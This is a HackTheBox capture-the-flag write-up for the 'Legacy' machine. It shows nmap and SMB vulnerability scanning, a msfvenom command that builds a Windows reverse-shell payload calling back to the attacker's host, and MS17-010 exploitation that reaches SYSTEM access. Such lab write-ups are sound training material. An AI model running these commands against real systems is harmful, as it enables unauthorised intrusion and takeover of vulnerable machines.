HackTheBox Legacy Writeup
Enjoy reading my HTB Legacy Writeup
Information Gathering
Let's begin with a basic nmap scan to gather information about the services running on the target machine:
sudo nmap -p 1-5000 -sV -sC -O -v 10.10.10.4
- Port 139: Microsoft Windows netbios-ssn
- Port 445: Windows XP microsoft-ds
- Port 3389 (closed): ms-wbt-server
Nmap also found out that you can connect to the Samba share using the guest account.
I tried several ways of enumerating the SMB share eg. using smbclient
with the -L flag in order to list all the shares or smbmap -H 10.10.10.4
but had no success.
Next, I searched for possible vulnerabilities using nmap in combination with NSE scripts:
nmap --script smb-vuln* -p 139,445 -v 10.10.10.4 -Pn
We got two hits:
- ms08-067 aka CVE-2008-4250 which allows Remote Code Execution
- ms17-010 aka CVE-2017-0143 with a high risk factor that also allows Remote Code Execution
MS17-010
First, let's create a payload using msfvenom:
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.180 LPORT=4545 -f exe > payload.exe
Now we can use the send_and_execute.py script from this github repo to transfer our payload and gain a reverse shell on our netcat listener.
Our shell spawns in C:\WINDOWS\system32
so we probably have high privileges. Unfortunately, we cannot confirm them using whoami
because that executable does not exist on the server.
I first thought about downloading it using curl but curl wasn't recognized either.
Next, I tried it with a SMB share using the smbserver script from impacket.
Using:
sudo smbserver.py pubshare /home/user/Desktop
I created a share that contains the whoami binary for windows.
Now on the HTB Legacy machine, I executed that executable with:
\\10.10.16.180\pubshare\whoami.exe
And that confirmed that we got nt authority\system permissions.
0C:\WINDOWS\system32>\\10.10.16.180\pubshare\whoami.exe
1\\10.10.16.180\pubshare\whoami.exe
2NT AUTHORITY\SYSTEM
Obtaining the shells
Navigate to: C:\Documents and Settings\john\Desktop
to get the user flag.
The root flag is located in C:\Documents and Settings\Administrator\Desktop
.
Tags:
HTB, HackTheBox, Legacy, MS17-010